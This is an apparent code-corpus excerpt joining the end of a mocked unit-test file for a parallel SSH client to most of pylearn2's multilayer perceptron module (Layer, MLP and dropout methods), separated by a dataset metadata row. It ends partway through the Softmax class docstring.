self.assertEqual(result['stderr'], 'b')
self.assertEqual(result['return_code'], -9)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, 'put', MagicMock(return_value={}))
@patch.object(os.path, 'exists', MagicMock(return_value=True))
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_put(self):
hosts = ['localhost', '127.0.0.1', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
client.put('/local/stuff', '/remote/stuff', mode=0744)
expected_kwargs = {
'mode': 0744,
'mirror_local_mode': False
}
for host in hosts:
hostname, _ = client._get_host_port_info(host)
client._hosts_client[hostname].put.assert_called_with('/local/stuff', '/remote/stuff',
**expected_kwargs)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, 'delete_file', MagicMock(return_value={}))
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_delete_file(self):
hosts = ['localhost', '127.0.0.1', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
client.delete_file('/remote/stuff')
for host in hosts:
hostname, _ = client._get_host_port_info(host)
client._hosts_client[hostname].delete_file.assert_called_with('/remote/stuff')
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, 'delete_dir', MagicMock(return_value={}))
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_delete_dir(self):
hosts = ['localhost', '127.0.0.1', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
client.delete_dir('/remote/stuff/', force=True)
expected_kwargs = {
'force': True,
'timeout': None
}
for host in hosts:
hostname, _ = client._get_host_port_info(host)
client._hosts_client[hostname].delete_dir.assert_called_with('/remote/stuff/',
**expected_kwargs)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_host_port_info(self):
client = ParallelSSHClient(hosts=['dummy'],
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
# No port case. Port should be 22.
host_str = '1.2.3.4'
host, port = client._get_host_port_info(host_str)
self.assertEqual(host, host_str)
self.assertEqual(port, 22)
# IPv6 with square brackets with port specified.
host_str = '[fec2::10]:55'
host, port = client._get_host_port_info(host_str)
self.assertEqual(host, 'fec2::10')
self.assertEqual(port, 55)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, 'run', MagicMock(
return_value=(json.dumps({'foo': 'bar'}), '', 0))
)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_run_command_json_output_transformed_to_object(self):
hosts = ['127.0.0.1']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
results = client.run('stuff', timeout=60)
self.assertTrue('127.0.0.1' in results)
self.assertDictEqual(results['127.0.0.1']['stdout'], {'foo': 'bar'})
| apache-2.0 | -4,133,305,447,443,318,000 | 43.569721 | 98 | 0.543309 | false |
CKehl/pylearn2 | pylearn2/models/mlp.py | 1 | 166462 | """
Multilayer Perceptron
"""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2012-2013, Universite de Montreal"
__credits__ = ["Ian Goodfellow", "David Warde-Farley"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
import logging
import math
import operator
import sys
import warnings
import numpy as np
from theano.compat import six
from theano.compat.six.moves import reduce, xrange
from theano import config
from theano.gof.op import get_debug_values
from theano.sandbox.rng_mrg import MRG_RandomStreams
from theano.sandbox.cuda.dnn import dnn_available, dnn_pool
from theano.tensor.signal.downsample import max_pool_2d
import theano.tensor as T
from pylearn2.compat import OrderedDict
from pylearn2.costs.mlp import Default
from pylearn2.expr.probabilistic_max_pooling import max_pool_channels
from pylearn2.linear import conv2d
from pylearn2.linear.matrixmul import MatrixMul
from pylearn2.model_extensions.norm_constraint import MaxL2FilterNorm
from pylearn2.models.model import Model
from pylearn2.monitor import get_monitor_doc
from pylearn2.expr.nnet import arg_of_softmax
from pylearn2.expr.nnet import pseudoinverse_softmax_numpy
from pylearn2.space import CompositeSpace
from pylearn2.space import Conv2DSpace
from pylearn2.space import Space
from pylearn2.space import VectorSpace, IndexSpace
from pylearn2.utils import function
from pylearn2.utils import is_iterable
from pylearn2.utils import py_float_types
from pylearn2.utils import py_integer_types
from pylearn2.utils import safe_union
from pylearn2.utils import safe_zip
from pylearn2.utils import safe_izip
from pylearn2.utils import sharedX
from pylearn2.utils import wraps
from pylearn2.utils import contains_inf
from pylearn2.utils import isfinite
from pylearn2.utils.data_specs import DataSpecsMapping
from pylearn2.expr.nnet import (elemwise_kl, kl, compute_precision,
compute_recall, compute_f1)
# Only to be used by the deprecation warning wrapper functions
from pylearn2.costs.mlp import L1WeightDecay as _L1WD
from pylearn2.costs.mlp import WeightDecay as _WD
from pylearn2.sandbox.rnn.models.mlp_hook import RNNWrapper
logger = logging.getLogger(__name__)
logger.debug("MLP changing the recursion limit.")
# We need this to be high enough that the big theano graphs we make
# when doing max pooling via subtensors don't cause python to complain.
# python intentionally declares stack overflow well before the stack
# segment is actually exceeded. But we can't make this value too big
# either, or we'll get seg faults when the python interpreter really
# does go over the stack segment.
# IG encountered seg faults on eos3 (a machine at LISA labo) when using
# 50000 so for now it is set to 40000.
# I think the actual safe recursion limit can't be predicted in advance
# because you don't know how big of a stack frame each function will
# make, so there is not really a "correct" way to do this. Really the
# python interpreter should provide an option to raise the error
# precisely when you're going to exceed the stack segment.
sys.setrecursionlimit(40000)
if six.PY3:
LayerBase = six.with_metaclass(RNNWrapper, Model)
else:
LayerBase = Model
class Layer(LayerBase):
"""
Abstract class. A Layer of an MLP.
May only belong to one MLP.
Parameters
----------
kwargs : dict
Passed on to the superclass.
Notes
-----
This is not currently a Block because as far as I know the Block interface
assumes every input is a single matrix. It doesn't support using Spaces to
work with composite inputs, stacked multichannel image inputs, etc. If the
Block interface were upgraded to be that flexible, then we could make this
a block.
"""
# This enables RNN compatibility
__metaclass__ = RNNWrapper
# When applying dropout to a layer's input, use this for masked values.
# Usually this will be 0, but certain kinds of layers may want to override
# this behaviour.
dropout_input_mask_value = 0.
def get_mlp(self):
"""
Returns the MLP that this layer belongs to.
Returns
-------
mlp : MLP
The MLP that this layer belongs to, or None if it has not been
assigned to an MLP yet.
"""
if hasattr(self, 'mlp'):
return self.mlp
return None
def set_mlp(self, mlp):
"""
Assigns this layer to an MLP. This layer will then use the MLP's
random number generator, batch size, etc. This layer's name must
be unique within the MLP.
Parameters
----------
mlp : MLP
"""
assert self.get_mlp() is None
self.mlp = mlp
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
"""
Returns monitoring channels.
Parameters
----------
state_below : member of self.input_space
A minibatch of states that this Layer took as input.
            Most of the time providing state_below is unnecessary when
state is given.
state : member of self.output_space
A minibatch of states that this Layer took on during fprop.
Provided externally so that we don't need to make a second
expression for it. This helps keep the Theano graph smaller
so that function compilation runs faster.
targets : member of self.output_space
Should be None unless this is the last layer.
If specified, it should be a minibatch of targets for the
last layer.
Returns
-------
channels : OrderedDict
A dictionary mapping channel names to monitoring channels of
interest for this layer.
"""
return OrderedDict()
def fprop(self, state_below):
"""
Does the forward prop transformation for this layer.
Parameters
----------
state_below : member of self.input_space
A minibatch of states of the layer below.
Returns
-------
state : member of self.output_space
A minibatch of states of this layer.
"""
raise NotImplementedError(
str(type(self)) + " does not implement fprop.")
def cost(self, Y, Y_hat):
"""
The cost of outputting Y_hat when the true output is Y.
Parameters
----------
Y : theano.gof.Variable
The targets
Y_hat : theano.gof.Variable
The predictions.
Assumed to be the output of the layer's `fprop` method.
            The implementation is permitted to do things like look at the
ancestors of `Y_hat` in the theano graph. This is useful for
e.g. computing numerically stable *log* probabilities when
`Y_hat` is the *probability*.
Returns
-------
cost : theano.gof.Variable
A Theano scalar describing the cost.
"""
raise NotImplementedError(
str(type(self)) + " does not implement mlp.Layer.cost.")
def cost_from_cost_matrix(self, cost_matrix):
"""
        The final scalar cost computed from the cost matrix
Parameters
----------
cost_matrix : WRITEME
Examples
--------
>>> # C = model.cost_matrix(Y, Y_hat)
>>> # Do something with C like setting some values to 0
>>> # cost = model.cost_from_cost_matrix(C)
"""
raise NotImplementedError(
str(type(self)) + " does not implement "
"mlp.Layer.cost_from_cost_matrix.")
def cost_matrix(self, Y, Y_hat):
"""
The element wise cost of outputting Y_hat when the true output is Y.
Parameters
----------
Y : WRITEME
Y_hat : WRITEME
Returns
-------
WRITEME
"""
raise NotImplementedError(
str(type(self)) + " does not implement mlp.Layer.cost_matrix")
def set_weights(self, weights):
"""
Sets the weights of the layer.
Parameters
----------
weights : ndarray
A numpy ndarray containing the desired weights of the layer. This
docstring is provided by the Layer base class. Layer subclasses
should add their own docstring explaining the subclass-specific
format of the ndarray.
"""
raise NotImplementedError(
str(type(self)) + " does not implement set_weights.")
def get_biases(self):
"""
Returns the value of the biases of the layer.
Returns
-------
biases : ndarray
A numpy ndarray containing the biases of the layer. This docstring
is provided by the Layer base class. Layer subclasses should add
their own docstring explaining the subclass-specific format of the
ndarray.
"""
raise NotImplementedError(
str(type(self)) + " does not implement "
"get_biases (perhaps because the class has no biases).")
def set_biases(self, biases):
"""
Sets the biases of the layer.
Parameters
----------
biases : ndarray
A numpy ndarray containing the desired biases of the layer. This
docstring is provided by the Layer base class. Layer subclasses
should add their own docstring explaining the subclass-specific
format of the ndarray.
"""
raise NotImplementedError(
str(type(self)) + " does not implement "
"set_biases (perhaps because the class has no biases).")
def get_weights_format(self):
"""
Returns a description of how to interpret the weights of the layer.
Returns
-------
format: tuple
Either ('v', 'h') or ('h', 'v').
('v', 'h') means a weight matrix of shape
(num visible units, num hidden units),
while ('h', 'v') means the transpose of it.
"""
raise NotImplementedError
def get_weight_decay(self, coeff):
"""
Provides an expression for a squared L2 penalty on the weights.
Parameters
----------
coeff : float or tuple
The coefficient on the weight decay penalty for this layer.
This docstring is provided by the Layer base class. Individual
Layer subclasses should add their own docstring explaining the
format of `coeff` for that particular layer. For most ordinary
layers, `coeff` is a single float to multiply by the weight
decay term. Layers containing many pieces may take a tuple or
nested tuple of floats, and should explain the semantics of
the different elements of the tuple.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the weight decay penalty term for this
layer.
"""
raise NotImplementedError(
str(type(self)) + " does not implement get_weight_decay.")
def get_l1_weight_decay(self, coeff):
"""
Provides an expression for an L1 penalty on the weights.
Parameters
----------
coeff : float or tuple
The coefficient on the L1 weight decay penalty for this layer.
This docstring is provided by the Layer base class. Individual
Layer subclasses should add their own docstring explaining the
format of `coeff` for that particular layer. For most ordinary
layers, `coeff` is a single float to multiply by the weight
decay term. Layers containing many pieces may take a tuple or
nested tuple of floats, and should explain the semantics of
the different elements of the tuple.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the L1 weight decay penalty term for this
layer.
"""
raise NotImplementedError(
str(type(self)) + " does not implement get_l1_weight_decay.")
def set_input_space(self, space):
"""
Tells the layer to prepare for input formatted according to the
given space.
Parameters
----------
space : Space
The Space the input to this layer will lie in.
Notes
-----
This usually resets parameters.
"""
raise NotImplementedError(
str(type(self)) + " does not implement set_input_space.")
class MLP(Layer):
"""
A multilayer perceptron.
Note that it's possible for an entire MLP to be a single layer of a larger
MLP.
Parameters
----------
layers : list
A list of Layer objects. The final layer specifies the output space
of this MLP.
batch_size : int, optional
        If specified, it must be a positive integer. Mostly useful if
one of your layers involves a Theano op like convolution that
requires a hard-coded batch size.
nvis : int, optional
Number of "visible units" (input units). Equivalent to specifying
`input_space=VectorSpace(dim=nvis)`. Note that certain methods require
        a different type of input space (e.g. a Conv2DSpace in the case of
convnets). Use the input_space parameter in such cases. Should be
None if the MLP is part of another MLP.
input_space : Space object, optional
A Space specifying the kind of input the MLP accepts. If None,
input space is specified by nvis. Should be None if the MLP is
part of another MLP.
input_source : string or (nested) tuple of strings, optional
        A (nested) tuple of strings specifying the input sources this
MLP accepts. The structure should match that of input_space. The
default is 'features'. Note that this argument is ignored when
the MLP is nested.
target_source : string or (nested) tuple of strings, optional
        A (nested) tuple of strings specifying the target sources this
MLP accepts. The structure should match that of target_space. The
default is 'targets'. Note that this argument is ignored when
the MLP is nested.
    layer_name : str, optional
        Name of the MLP layer. Should be None if the MLP is
        not part of another MLP.
seed : WRITEME
monitor_targets : bool, optional
Default: True
If true, includes monitoring channels that are functions of the
targets. This can be disabled to allow monitoring on monitoring
datasets that do not include targets.
kwargs : dict
Passed on to the superclass.
"""
def __init__(self, layers, batch_size=None, input_space=None,
input_source='features', target_source='targets',
nvis=None, seed=None, layer_name=None, monitor_targets=True,
**kwargs):
super(MLP, self).__init__(**kwargs)
self.seed = seed
assert isinstance(layers, list)
assert all(isinstance(layer, Layer) for layer in layers)
assert len(layers) >= 1
self.layer_name = layer_name
self.layer_names = set()
for layer in layers:
assert layer.get_mlp() is None
if layer.layer_name in self.layer_names:
raise ValueError("MLP.__init__ given two or more layers "
"with same name: " + layer.layer_name)
layer.set_mlp(self)
self.layer_names.add(layer.layer_name)
self.layers = layers
self.batch_size = batch_size
self.force_batch_size = batch_size
self._input_source = input_source
self._target_source = target_source
self.monitor_targets = monitor_targets
if input_space is not None or nvis is not None:
self._nested = False
self.setup_rng()
# check if the layer_name is None (the MLP is the outer MLP)
assert layer_name is None
if nvis is not None:
input_space = VectorSpace(nvis)
# Check whether the input_space and input_source structures match
try:
DataSpecsMapping((input_space, input_source))
except ValueError:
raise ValueError("The structures of `input_space`, %s, and "
"`input_source`, %s do not match. If you "
"specified a CompositeSpace as an input, "
"be sure to specify the data sources as well."
% (input_space, input_source))
self.input_space = input_space
self._update_layer_input_spaces()
else:
self._nested = True
self.freeze_set = set([])
@property
def input_source(self):
assert not self._nested, "A nested MLP does not have an input source"
return self._input_source
@property
def target_source(self):
assert not self._nested, "A nested MLP does not have a target source"
return self._target_source
def setup_rng(self):
"""
        Set up the numpy random number generator used to initialize this
        MLP's layers, seeding it with `self.seed`.
"""
assert not self._nested, "Nested MLPs should use their parent's RNG"
if self.seed is None:
self.seed = [2013, 1, 4]
self.rng = np.random.RandomState(self.seed)
@wraps(Layer.get_default_cost)
def get_default_cost(self):
return Default()
@wraps(Layer.get_output_space)
def get_output_space(self):
return self.layers[-1].get_output_space()
@wraps(Layer.get_target_space)
def get_target_space(self):
return self.layers[-1].get_target_space()
@wraps(Layer.set_input_space)
def set_input_space(self, space):
if hasattr(self, "mlp"):
#assert self._nested
self.input_space = self.mlp.input_space
self.rng = self.mlp.rng
self.batch_size = self.mlp.batch_size
else:
self.input_space = space
self._update_layer_input_spaces()
def _update_layer_input_spaces(self):
"""
Tells each layer what its input space should be.
Notes
-----
This usually resets the layer's parameters!
"""
layers = self.layers
try:
layers[0].set_input_space(self.get_input_space())
except BadInputSpaceError as e:
raise TypeError("Layer 0 (" + str(layers[0]) + " of type " +
str(type(layers[0])) +
") does not support the MLP's "
+ "specified input space (" +
str(self.get_input_space()) +
" of type " + str(type(self.get_input_space())) +
"). Original exception: " + str(e))
for i in xrange(1, len(layers)):
layers[i].set_input_space(layers[i - 1].get_output_space())
def add_layers(self, layers):
"""
Add new layers on top of the existing hidden layers
Parameters
----------
        layers : list of Layer
            The layers to add on top of the existing layers.
"""
existing_layers = self.layers
assert len(existing_layers) > 0
for layer in layers:
assert layer.get_mlp() is None
layer.set_mlp(self)
# In the case of nested MLPs, input/output spaces may have not yet
# been initialized
if not self._nested or hasattr(self, 'input_space'):
layer.set_input_space(existing_layers[-1].get_output_space())
existing_layers.append(layer)
assert layer.layer_name not in self.layer_names
self.layer_names.add(layer.layer_name)
def freeze(self, parameter_set):
"""
Freezes some of the parameters (new theano functions that implement
learning will not use them; existing theano functions will continue
to modify them).
Parameters
----------
parameter_set : set
Set of parameters to freeze.
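        Examples
        --------
        An illustrative sketch (assumes `mlp` is an already constructed
        MLP); this stops the first layer's parameters from being updated
        by learning functions compiled afterwards:
        >>> mlp.freeze(set(mlp.layers[0].get_params()))  # doctest: +SKIP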
"""
self.freeze_set = self.freeze_set.union(parameter_set)
@wraps(Layer.get_monitoring_channels)
def get_monitoring_channels(self, data):
        # If the MLP is the outer MLP
        # (i.e. the MLP is not contained in another structure)
if self.monitor_targets:
X, Y = data
else:
X = data
Y = None
state = X
rval = self.get_layer_monitoring_channels(state_below=X,
targets=Y)
return rval
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = OrderedDict()
state = state_below
for layer in self.layers:
# We don't go through all the inner layers recursively
state_below = state
state = layer.fprop(state)
args = [state_below, state]
if layer is self.layers[-1] and targets is not None:
args.append(targets)
ch = layer.get_layer_monitoring_channels(*args)
if not isinstance(ch, OrderedDict):
raise TypeError(str((type(ch), layer.layer_name)))
for key in ch:
value = ch[key]
doc = get_monitor_doc(value)
if doc is None:
doc = str(type(layer)) + \
".get_monitoring_channels_from_state did" + \
" not provide any further documentation for" + \
" this channel."
if layer.layer_name is not None:
doc = 'This channel came from a layer called "' + \
layer.layer_name + '" of an MLP.\n' + doc
else:
doc = 'This channel came from a pickled layer' + \
' of an MLP.\n' + doc
layer.layer_name = "pickled_pretrained"
value.__doc__ = doc
rval[layer.layer_name + '_' + key] = value
return rval
def get_monitoring_data_specs(self):
"""
Returns data specs requiring both inputs and targets.
Returns
-------
        data_specs : (space, source) pair
The data specifications for both inputs and targets.
"""
if not self.monitor_targets:
return (self.get_input_space(), self.get_input_source())
space = CompositeSpace((self.get_input_space(),
self.get_target_space()))
source = (self.get_input_source(), self.get_target_source())
return (space, source)
@wraps(Layer.get_params)
def get_params(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
rval = []
for layer in self.layers:
for param in layer.get_params():
if param.name is None:
logger.info(type(layer))
layer_params = layer.get_params()
assert not isinstance(layer_params, set)
for param in layer_params:
if param not in rval:
rval.append(param)
rval = [elem for elem in rval if elem not in self.freeze_set]
assert all([elem.name is not None for elem in rval])
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeffs):
# check the case where coeffs is a scalar
if not hasattr(coeffs, '__iter__'):
coeffs = [coeffs] * len(self.layers)
layer_costs = []
for layer, coeff in safe_izip(self.layers, coeffs):
if coeff != 0.:
layer_costs += [layer.get_weight_decay(coeff)]
if len(layer_costs) == 0:
return T.constant(0, dtype=config.floatX)
total_cost = reduce(operator.add, layer_costs)
return total_cost
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeffs):
# check the case where coeffs is a scalar
if not hasattr(coeffs, '__iter__'):
coeffs = [coeffs] * len(self.layers)
layer_costs = []
for layer, coeff in safe_izip(self.layers, coeffs):
if coeff != 0.:
layer_costs += [layer.get_l1_weight_decay(coeff)]
if len(layer_costs) == 0:
return T.constant(0, dtype=config.floatX)
total_cost = reduce(operator.add, layer_costs)
return total_cost
@wraps(Model.set_batch_size)
def set_batch_size(self, batch_size):
self.batch_size = batch_size
self.force_batch_size = batch_size
for layer in self.layers:
layer.set_batch_size(batch_size)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
for layer in self.layers:
layer.modify_updates(updates)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
return get_lr_scalers_from_layers(self)
@wraps(Layer.get_weights)
def get_weights(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights()
@wraps(Layer.get_weights_view_shape)
def get_weights_view_shape(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights_view_shape()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights_format()
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights_topo()
def dropout_fprop(self, state_below, default_input_include_prob=0.5,
input_include_probs=None, default_input_scale=2.,
input_scales=None, per_example=True):
"""
Returns the output of the MLP, when applying dropout to the input and
intermediate layers.
Parameters
----------
        state_below : member of self.input_space
            The input to the MLP
        default_input_include_prob : float
            The probability of including a layer's input, used for every
            layer whose name does not appear in `input_include_probs`.
        input_include_probs : dict, optional
            A dictionary mapping layer names to the probability of
            including their input.
        default_input_scale : float
            The amount to scale a layer's input when it is included, used
            for every layer whose name does not appear in `input_scales`.
        input_scales : dict, optional
            A dictionary mapping layer names to the amount to scale their
            input by.
per_example : bool, optional
Sample a different mask value for every example in a batch.
Defaults to `True`. If `False`, sample one mask per mini-batch.
Notes
-----
Each input to each layer is randomly included or
excluded for each example. The probability of inclusion is independent
for each input and each example. Each layer uses
`default_input_include_prob` unless that layer's name appears as a key
in input_include_probs, in which case the input inclusion probability
is given by the corresponding value.
Each feature is also multiplied by a scale factor. The scale factor for
each layer's input scale is determined by the same scheme as the input
probabilities.
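        Examples
        --------
        An illustrative sketch (assumes `mlp` is an already constructed
        MLP whose first hidden layer is named 'h0', and `X` is a symbolic
        batch of inputs; the probabilities and scales are arbitrary):
        >>> y_drop = mlp.dropout_fprop(
        ...     X,
        ...     default_input_include_prob=0.5,
        ...     default_input_scale=2.,
        ...     input_include_probs={'h0': 0.8},
        ...     input_scales={'h0': 1.25})  # doctest: +SKIP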
"""
if input_include_probs is None:
input_include_probs = {}
if input_scales is None:
input_scales = {}
self._validate_layer_names(list(input_include_probs.keys()))
self._validate_layer_names(list(input_scales.keys()))
theano_rng = MRG_RandomStreams(max(self.rng.randint(2 ** 15), 1))
for layer in self.layers:
layer_name = layer.layer_name
if layer_name in input_include_probs:
include_prob = input_include_probs[layer_name]
else:
include_prob = default_input_include_prob
if layer_name in input_scales:
scale = input_scales[layer_name]
else:
scale = default_input_scale
state_below = self.apply_dropout(
state=state_below,
include_prob=include_prob,
theano_rng=theano_rng,
scale=scale,
mask_value=layer.dropout_input_mask_value,
input_space=layer.get_input_space(),
per_example=per_example
)
state_below = layer.fprop(state_below)
return state_below
def masked_fprop(self, state_below, mask, masked_input_layers=None,
default_input_scale=2., input_scales=None):
"""
Forward propagate through the network with a dropout mask
determined by an integer (the binary representation of
which is used to generate the mask).
Parameters
----------
state_below : tensor_like
The (symbolic) output state of the layer below.
mask : int
An integer indexing possible binary masks. It should be
< 2 ** get_total_input_dimension(masked_input_layers)
and greater than or equal to 0.
masked_input_layers : list, optional
A list of layer names to mask. If `None`, the input to all layers
(including the first hidden layer) is masked.
default_input_scale : float, optional
The amount to scale inputs in masked layers that do not appear in
`input_scales`. Defaults to 2.
input_scales : dict, optional
A dictionary mapping layer names to floating point numbers
indicating how much to scale input to a given layer.
Returns
-------
masked_output : tensor_like
The output of the forward propagation of the masked network.
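        Examples
        --------
        An illustrative sketch that enumerates every dropout mask of a
        very small network (assumes `mlp` is an already constructed MLP
        with only a handful of layer inputs, and `X` is a symbolic batch
        of inputs):
        >>> n = mlp.get_total_input_dimension(mlp.layer_names)
        >>> outputs = [mlp.masked_fprop(X, m)
        ...            for m in xrange(2 ** n)]  # doctest: +SKIP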
"""
        if masked_input_layers is not None:
            self._validate_layer_names(masked_input_layers)
        else:
            masked_input_layers = self.layer_names
        if input_scales is not None:
            self._validate_layer_names(input_scales)
        else:
            input_scales = {}
        if any(n not in masked_input_layers for n in input_scales):
            layers = [n for n in input_scales if n not in masked_input_layers]
            raise ValueError("input scales provided for layer not masked: %s" %
                             ", ".join(layers))
num_inputs = self.get_total_input_dimension(masked_input_layers)
assert mask >= 0, "Mask must be a non-negative integer."
if mask > 0 and math.log(mask, 2) > num_inputs:
raise ValueError("mask value of %d too large; only %d "
"inputs to layers (%s)" %
(mask, num_inputs,
", ".join(masked_input_layers)))
def binary_string(x, length, dtype):
"""
Create the binary representation of an integer `x`, padded to
`length`, with dtype `dtype`.
Parameters
----------
            x : int
                The integer to convert.
            length : int
                The number of bits in the representation.
            dtype : str or numpy.dtype
                The dtype of the returned array.
            Returns
            -------
            s : ndarray
                The binary representation of `x`, least significant bit
                first.
"""
s = np.empty(length, dtype=dtype)
for i in range(length - 1, -1, -1):
if x // (2 ** i) == 1:
s[i] = 1
else:
s[i] = 0
x = x % (2 ** i)
return s
remaining_mask = mask
for layer in self.layers:
if layer.layer_name in masked_input_layers:
scale = input_scales.get(layer.layer_name,
default_input_scale)
n_inputs = layer.get_input_space().get_total_dimension()
layer_dropout_mask = remaining_mask & (2 ** n_inputs - 1)
remaining_mask >>= n_inputs
mask = binary_string(layer_dropout_mask, n_inputs,
'uint8')
shape = layer.get_input_space().get_origin_batch(1).shape
s_mask = T.as_tensor_variable(mask).reshape(shape)
if layer.dropout_input_mask_value == 0:
state_below = state_below * s_mask * scale
else:
state_below = T.switch(s_mask, state_below * scale,
layer.dropout_input_mask_value)
state_below = layer.fprop(state_below)
return state_below
def _validate_layer_names(self, layers):
"""
        Check that every name in `layers` is the name of a layer in this
        MLP, and raise a ValueError otherwise.
"""
if any(layer not in self.layer_names for layer in layers):
unknown_names = [layer for layer in layers
if layer not in self.layer_names]
raise ValueError("MLP has no layer(s) named %s" %
", ".join(unknown_names))
def get_total_input_dimension(self, layers):
"""
Get the total number of inputs to the layers whose
names are listed in `layers`. Used for computing the
total number of dropout masks.
Parameters
----------
        layers : list of str
            The names of the layers whose input dimensions should be
            summed.
        Returns
        -------
        total : int
            The total number of inputs to the named layers.
"""
self._validate_layer_names(layers)
total = 0
for layer in self.layers:
if layer.layer_name in layers:
total += layer.get_input_space().get_total_dimension()
return total
@wraps(Layer.fprop)
def fprop(self, state_below, return_all=False):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
rval = self.layers[0].fprop(state_below)
rlist = [rval]
for layer in self.layers[1:]:
rval = layer.fprop(rval)
rlist.append(rval)
if return_all:
return rlist
return rval
def apply_dropout(self, state, include_prob, scale, theano_rng,
input_space, mask_value=0, per_example=True):
"""
        Apply dropout to `state`, randomly excluding units and rescaling
        the remaining ones.
        Parameters
        ----------
        state : tensor_like or tuple of tensor_like
            The state (or tuple of states) to apply dropout to.
        include_prob : float
            The probability of keeping each unit of `state`.
        scale : float
            The amount to scale the kept units by.
        theano_rng : MRG_RandomStreams
            The Theano random number generator used to sample the mask.
        input_space : Space
            The space `state` lies in; used to build a per-minibatch mask
            when `per_example` is False.
        mask_value : float, optional
            The value dropped-out units are set to. Defaults to 0.
per_example : bool, optional
Sample a different mask value for every example in a batch.
Defaults to `True`. If `False`, sample one mask per mini-batch.
"""
if include_prob in [None, 1.0, 1]:
return state
assert scale is not None
if isinstance(state, tuple):
return tuple(self.apply_dropout(substate, include_prob,
scale, theano_rng, mask_value)
for substate in state)
# TODO: all of this assumes that if it's not a tuple, it's
# a dense tensor. It hasn't been tested with sparse types.
# A method to format the mask (or any other values) as
# the given symbolic type should be added to the Spaces
# interface.
if per_example:
mask = theano_rng.binomial(p=include_prob, size=state.shape,
dtype=state.dtype)
else:
batch = input_space.get_origin_batch(1)
mask = theano_rng.binomial(p=include_prob, size=batch.shape,
dtype=state.dtype)
rebroadcast = T.Rebroadcast(*zip(xrange(batch.ndim),
[s == 1 for s in batch.shape]))
mask = rebroadcast(mask)
if mask_value == 0:
rval = state * mask * scale
else:
rval = T.switch(mask, state * scale, mask_value)
return T.cast(rval, state.dtype)
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
return self.layers[-1].cost(Y, Y_hat)
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
return self.layers[-1].cost_matrix(Y, Y_hat)
@wraps(Layer.cost_from_cost_matrix)
def cost_from_cost_matrix(self, cost_matrix):
return self.layers[-1].cost_from_cost_matrix(cost_matrix)
def cost_from_X(self, data):
"""
Computes self.cost, but takes data=(X, Y) rather than Y_hat as an
argument.
This is just a wrapper around self.cost that computes Y_hat by
calling Y_hat = self.fprop(X)
Parameters
----------
        data : tuple
            An (X, Y) pair conforming to `self.cost_from_X_data_specs()`.
"""
self.cost_from_X_data_specs()[0].validate(data)
X, Y = data
Y_hat = self.fprop(X)
return self.cost(Y, Y_hat)
def cost_from_X_data_specs(self):
"""
Returns the data specs needed by cost_from_X.
This is useful if cost_from_X is used in a MethodCost.
"""
space = CompositeSpace((self.get_input_space(),
self.get_target_space()))
source = (self.get_input_source(), self.get_target_source())
return (space, source)
def __str__(self):
"""
Summarizes the MLP by printing the size and format of the input to all
layers. Feel free to add reasonably concise info as needed.
"""
rval = []
for layer in self.layers:
rval.append(layer.layer_name)
input_space = layer.get_input_space()
rval.append('\tInput space: ' + str(input_space))
rval.append('\tTotal input dimension: ' +
str(input_space.get_total_dimension()))
rval = '\n'.join(rval)
return rval
class Softmax(Layer):
"""
A layer that can apply an optional affine transformation
to vectorial inputs followed by a softmax nonlinearity.
Parameters
----------
n_classes : int
Number of classes for softmax targets.
layer_name : string
Name of Softmax layers.
irange : float
If specified, initialized each weight randomly in
U(-irange, irange).
istdev : float
If specified, initialize each weight randomly from
N(0,istdev).
sparse_init : int
If specified, initial sparse_init number of weights
for each unit from N(0,1).
W_lr_scale : float
Scale for weight learning rate.
b_lr_scale : float
Scale for bias learning rate.
max_row_norm : float
Maximum norm for a row of the weight matrix.
no_affine : boolean
If True, softmax nonlinearity is applied directly to
inputs.
max_col_norm : float
Maximum norm for a column of the weight matrix.
init_bias_target_marginals : dataset
Take the probability distribution of the targets into account to
intelligently initialize biases.
binary_target_dim : int, optional
If your targets are class labels (i.e. a binary vector) then set the
number of targets here so that an IndexSpace of the proper dimension
can be used as the target space. This allows the softmax to compute
